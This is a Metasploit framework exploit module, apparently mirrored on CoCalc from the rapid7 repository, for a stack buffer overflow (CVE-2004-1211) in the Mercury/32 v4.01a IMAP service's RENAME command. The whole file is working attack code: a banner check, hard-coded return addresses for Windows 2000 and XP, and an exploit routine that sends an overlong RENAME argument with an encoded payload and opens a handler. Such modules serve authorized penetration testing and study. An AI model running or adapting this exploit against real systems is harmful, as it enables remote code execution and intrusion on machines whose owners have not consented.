Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/imap/mercury_rename.rb
19516 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = AverageRanking
8
9
include Msf::Exploit::Remote::Imap
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Mercury/32 v4.01a IMAP RENAME Buffer Overflow',
16
'Description' => %q{
17
This module exploits a stack buffer overflow vulnerability in the
18
Mercury/32 v.4.01a IMAP service.
19
},
20
'Author' => [ 'MC' ],
21
'License' => MSF_LICENSE,
22
'References' => [
23
[ 'CVE', '2004-1211'],
24
[ 'OSVDB', '12508'],
25
[ 'BID', '11775'],
26
[ 'URL', 'http://www.nessus.org/plugins/index.php?view=single&id=15867'],
27
],
28
'Privileged' => true,
29
'DefaultOptions' => {
30
'EXITFUNC' => 'process',
31
},
32
'Payload' => {
33
'Space' => 500,
34
'BadChars' => "\x00\x0a\x0d\x20",
35
'StackAdjustment' => -3500,
36
},
37
'Platform' => 'win',
38
'Targets' => [
39
['Windows 2000 SP4 English', { 'Ret' => 0x7846107b }],
40
['Windows XP Pro SP0 English', { 'Ret' => 0x77dc0df0 }],
41
['Windows XP Pro SP1 English', { 'Ret' => 0x77e53877 }],
42
],
43
'DisclosureDate' => '2004-11-29',
44
'Notes' => {
45
'Reliability' => UNKNOWN_RELIABILITY,
46
'Stability' => UNKNOWN_STABILITY,
47
'SideEffects' => UNKNOWN_SIDE_EFFECTS
48
}
49
)
50
)
51
end
52
53
def check
54
connect
55
resp = sock.get_once
56
disconnect
57
58
if (resp =~ /Mercury\/32 v4\.01a/)
59
return Exploit::CheckCode::Appears
60
end
61
62
return Exploit::CheckCode::Safe
63
end
64
65
def exploit
66
connect_login
67
68
sploit = "a001 RENAME " + rand_text_alpha_upper(260)
69
sploit << [target.ret].pack('V') + payload.encoded
70
71
sock.put(sploit)
72
73
handler
74
disconnect
75
end
76
end
77
78